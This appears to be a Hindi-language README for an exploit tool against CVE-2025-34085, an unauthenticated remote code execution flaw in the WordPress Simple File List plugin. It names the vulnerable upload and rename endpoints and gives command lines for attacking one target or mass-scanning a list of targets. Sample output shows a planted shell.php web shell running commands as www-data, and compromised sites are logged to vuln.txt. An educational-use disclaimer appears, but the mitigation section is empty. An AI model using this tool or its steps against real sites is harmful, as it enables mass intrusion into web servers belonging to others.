
WordPress Simple File List अप्रमाणित RCE शोषण
CVE-2025-34085 के लिए एक स्वचालित एक्सप्लॉइट और स्कैनर, जो WordPress Simple File List प्लगइन में एक गंभीर कमजोरी है, जो मनमानी फ़ाइल अपलोड और नाम बदलने की कार्यक्षमताओं के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन सक्षम करता है।
बिना प्रमाणीकरण के फ़ाइल अपलोड
/wp-content/plugins/simple-file-list/ee-upload-engine.phpPHP एक्सटेंशन में नाम बदलें
.php या समान एक्सटेंशन में बदलता है:/wp-content/plugins/simple-file-list/ee-file-engine.phpपेलोड निष्पादित करें
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
लक्ष्य URL को targets.txt में रखें (एक पंक्ति में एक), फिर चलाएँ:
python3 CVE-2025-34085.py --cmd "whoami"
| तर्क | विवरण |
|---|---|
-u | लक्ष्य URL (उदा., http://example.com) |
--cmd | रिमोट शेल पर निष्पादित करने का कमांड (डिफ़ॉल्ट: id) |
--inline | इनलाइन पेलोड का उपयोग करें (कोई ?cmd= पैरामीटर नहीं) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
सफल लक्ष्य vuln.txt में सहेजे जाते हैं।
CVE-2025-34085.py — मुख्य एक्सप्लॉइट स्क्रिप्टtargets.txt — (वैकल्पिक) लक्ष्य डोमेन की सूचीvuln.txt — सफल शोषण का लॉगप्रशासकों को चाहिए:
यह परियोजना केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है। लेखक इस उपकरण के दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।
यह परियोजना MIT लाइसेंस के तहत लाइसेंस प्राप्त है। 📄 पूरा लाइसेंस टेक्स्ट देखें
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n